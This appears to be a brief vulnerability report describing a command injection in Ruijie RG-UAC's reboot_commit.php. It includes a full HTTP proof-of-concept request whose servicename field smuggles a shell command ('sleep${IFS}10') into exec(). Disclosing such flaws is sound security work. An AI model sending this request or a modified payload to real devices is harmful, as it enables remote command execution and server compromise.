Ruijie Network is a professional network manufacturer with a full range of network equipment products and solutions including switches, routers, software, security firewalls, wireless products, storage, etc.
There is a command execution vulnerability in Ruijie RG-UAC. Attackers exploit vulnerabilities to compromise servers.
official:https://www.ruijie.com.cn
version:1.0
/view/systemConfig/reboot/reboot_commit.php
The key code is marked, the variable $rebootmode is not equal to 1, and $servicename is controllable, directly substituted into exec, resulting in rce vulnerability.
Login background, construct poc, successfully verify rce vulnerability
poc: POST /view/systemConfig/reboot/reboot_commit.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Cookie: PHPSESSID=f8a12a507141292b1dabce52b88335da Upgrade-Insecure-Requests: 1 X-Forwarded-For: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length: 45
rebootmode=222&servicename==sleep${IFS}10;1
